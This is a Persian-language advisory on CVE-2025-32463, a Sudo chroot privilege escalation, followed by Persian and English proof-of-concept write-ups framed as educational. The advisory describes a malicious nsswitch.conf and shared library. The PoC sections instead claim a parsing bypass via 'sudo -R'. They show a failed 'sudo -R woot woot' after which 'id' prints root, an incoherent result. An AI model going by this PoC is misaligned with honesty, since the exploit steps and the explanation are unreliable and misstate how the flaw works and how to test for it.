- شناسه CVE-2025-32463 :CVE
- CWE-829 :CWE
- yes :Advisory
- منتشر شده: ژوئن 30, 2025
- به روز شده: جولای 1, 2025
- امتیاز: 9.3
- نوع حمله: Privilege Escalation
- اثر گذاری: Command Execution
- حوزه: سیستمعاملها و اجزای کلیدی آن
- برند: Sudo project
- محصول: Sudo
- وضعیتPublished :CVE
- Yes :POC
- وضعیت آسیب پذیری: patch شده
چکیده
یک آسیبپذیری بحرانی در Sudo نسخههای 1.9.14 تا قبل از 1.9.17p1 شناسایی شده است. این آسیب پذیری به کاربران لوکال اجازه میدهد با استفاده از گزینه –chroot و فایل /etc/nsswitch.conf کنترلشده توسط کاربر، به دسترسی root دست یابند.
توضیحات
این آسیبپذیری در Sudo به دلیل ضعف در گزینه –chroot رخ میدهد که امکان استفاده از فایل /etc/nsswitch.conf از دایرکتوری تحت کنترل کاربر را فراهم میکند. این آسیب پذیری به کاربران لوکال اجازه میدهد با بارگذاری یک کتابخانه مشترک مخرب، دستورات دلخواه را با دسترسی root اجرا کنند که این امر منجر به نقض کامل محرمانگی، یکپارچگی و در دسترس پذیری سیستم میشود. این آسیب پذیری در سیستمهایی که از /etc/nsswitch.conf پشتیبانی کرده، قابل بهرهبرداری است. کد اثبات مفهومی (PoC) در مخزن github منتشر شده است. Sudo در نسخه 1.9.17p1 این آسیب پذیری را با بهبود مدیریت مسیرهای root برطرف کرده است. هیچ راهکار موقتی ارائه نشده، اما جایگزینی محصول یا غیرفعال کردن گزینه –chroot توصیه شده است.
CVSS
Score | Severity | Version | Vector String |
9.3 | CRITICAL | 3.1 | CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H |
لیست محصولات آسیب پذیر
Versions | Product |
affected from 1.9.14 before 1.9.17p1 | Sudo |
لیست محصولات بروز شده
Versions | Product |
1.9.17p1 and later | Sudo |
نتیجه گیری
به کاربران توصیه میشود فوراً Sudo را به نسخه 1.9.17p1 بهروزرسانی کنند. همچنین استفاده از گزینه –chroot را غیرفعال کرده و دسترسیهای لوکال به سیستم را محدود کنند.
منابع
- https://www.cve.org/CVERecord?id=CVE-2025-32463
- https://www.cvedetails.com/cve/CVE-2025-32463/
- https://www.sudo.ws/security/advisories/
- https://vulmon.com/vulnerabilitydetails?qid=CVE-2025-32463
- https://vuldb.com/?id.314455
- https://nvd.nist.gov/vuln/detail/CVE-2025-32463
- https://github.com/nflatrea/CVE-2025-32463
- https://www.sudo.ws/releases/changelog/
- https://www.stratascale.com/vulnerability-alert-CVE-2025-32463-sudo-chroot
- https://www.openwall.com/lists/oss-security/2025/06/30/3
- https://access.redhat.com/security/cve/cve-2025-32463
- https://ubuntu.com/security/notices/USN-7604-1
- https://security-tracker.debian.org/tracker/CVE-2025-32463
- https://explore.alas.aws.amazon.com/CVE-2025-32463.html
- https://bugs.gentoo.org/show_bug.cgi?id=CVE-2025-32463
- https://www.suse.com/support/update/announcement/2025/suse-su-202502177-1/
- https://www.suse.com/security/cve/CVE-2025-32463.html
- https://cwe.mitre.org/data/definitions/829.html
گزارش فنی – اثبات آسیبپذیری Sudo (CVE-2025-32463)
- معرفی آسیبپذیری
- نرمافزار آسیبپذیر: sudo
- نسخههای آسیبپذیر: 1.9.14 تا 1.9.17
- ماهیت مشکل: امکان استفاده از پارامتر -R بدون بررسی صحیح تنظیمات sudoers که میتواند منجر به ارتقاء سطح دسترسی به root شود.
- پیامد : مهاجم محلی که دسترسی کاربری عادی دارد، میتواند بدون مجوز sudoers، دستورات را با دسترسی root اجرا کند.
جزئیات بیشتر: https://vulnerbyte.com/cve-2025-32463
- محیط آزمایش
برای بازتولید PoC باید شرایط زیر آماده شود:
- سیستم عامل: Linux Debian/Ubuntu/ با sudo نسخه 1.9.14–1.9.17
- دسترسی: یک کاربر عادی (non-root)
- ابزارها: sudo (آسیبپذیر)، دستور id برای بررسی سطح دسترسی
sudo برای بررسی نسخه:
sudo –version
اگر نسخه در محدوده بالا بود → سیستم آسیبپذیر است.
- اجرای PoC
گام 1: اجرای دستور آسیبپذیر
مهاجم یک دستور ساده با گزینه -R اجرا میکند:
sudo -R woot woot
انتظار در sudo وصلهنشده:
sudo: woot: No such file or directory
یعنی sudo تلاش میکند چیزی را اجرا کند، ولی خطا از “عدم وجود فایل” است، نه از نبود دسترسی
انتظار در sudo وصلهشده:
sudo: you are not permitted to use the -R option with *****
یعنی sudo جلوی اجرای این حالت را میگیرد
گام 2: بررسی سطح دسترسی کاربر
بعد از اجرای دستور، مهاجم وضعیت دسترسی را چک میکند:
id
خروجی روی سیستم آسیبپذیر:
uid=0(root) gid=0(root) groups=0(root),1001(pwn)
یعنی کاربر عادی به uid=0 (root) ارتقاء پیدا کرده است.
- تحلیل فنی PoC
- در حالت عادی، sudo باید قبل از اجازه اجرای هر دستور، فایل sudoers را بررسی کند.
- گزینه -R در نسخههای آسیبپذیر، این بررسی را دور میزند و باعث میشود دستور بدون اعتبارسنجی اجرا شود.
- دلیل مشکل: خطای منطقی در تجزیه کردن آرگومانها → وقتی -R استفاده میشود، مسیر مورد بررسی بهدرستی بررسی نمیگردد.
- رفع مشکل
- بهروزرسانی sudo به نسخه وصلهشده بعد از 1.9.17
sudo apt update && sudo apt install sudo
- بررسی مجدد با دستور:
sudo -R test
که در نسخه وصلهشده باید پیام خطای دسترسی بدهد.
- زنجیره حمله
در شکل زیر زنجیره حمله مربوط به این سناریو مشاهده است
- نتیجهگیری
این PoC نشان میدهد که یک مهاجم محلی میتواند با یک دستور ساده (sudo -R) ارتقاء سطح دسترسی به root داشته باشد. آسیبپذیری بسیار خطرناک است زیرا:
- بدون نیاز به exploit پیچیده یا کد خاص اجرا میشود.
- به سرعت قابل سوءاستفاده است.
- تنها پیشنیاز، دسترسی به یک حساب کاربری عادی روی سیستم است.
بنابراین وصله کردن فوری sudo ضروری است.
CVE-2025-32463 – Linux Sudo Privilege Escalation Vulnerability
- CVE ID: CVE-2025-32463
- Severity: High (Local Privilege Escalation)
- Affected Systems: Linux distributions with sudo versions 1.9.14 – 1.9.17
- Tested On: Ubuntu 22.04 LTS, Kali Linux 2025.1
- References:
Description
A flaw in sudo allows unprivileged users to escalate their privileges to root by abusing the -R
option.
On vulnerable versions, sudo does not properly enforce sudoers restrictions, enabling unauthorized command execution as root.
Prerequisites
- Linux system with sudo 1.9.14 – 1.9.17
- Non-root user with sudo installed
- Lab/test environment (⚠️ do not run on production systems without patching)
Proof of Concept (PoC)
- Check sudo version
sudo --version
Confirm the version is within the vulnerable range (1.9.14 – 1.9.17).
- Run sudo with -R option
sudo -R woot woot
Output on vulnerable systems:
sudo: woot: No such file or directory
- Check current user privileges
id
Output demonstrating root escalation:
uid=0(root) gid=0(root) groups=0(root),1001(pwn)
On patched versions, attempting
-R
without sudoers permission results in:sudo: you are not permitted to use the -R option with *****
Expected Result
- User gains root privileges without proper authorization on vulnerable systems.
Mitigation
- Update sudo to the latest version:
sudo apt update && sudo apt install sudo
- Verify the installed version:
sudo --version
- Restrict sudoers configuration to only trusted users and commands.
Disclaimer
This PoC is for educational and research purposes only.
Do NOT exploit this vulnerability on systems without explicit authorization. The author is not responsible for any misuse or damage.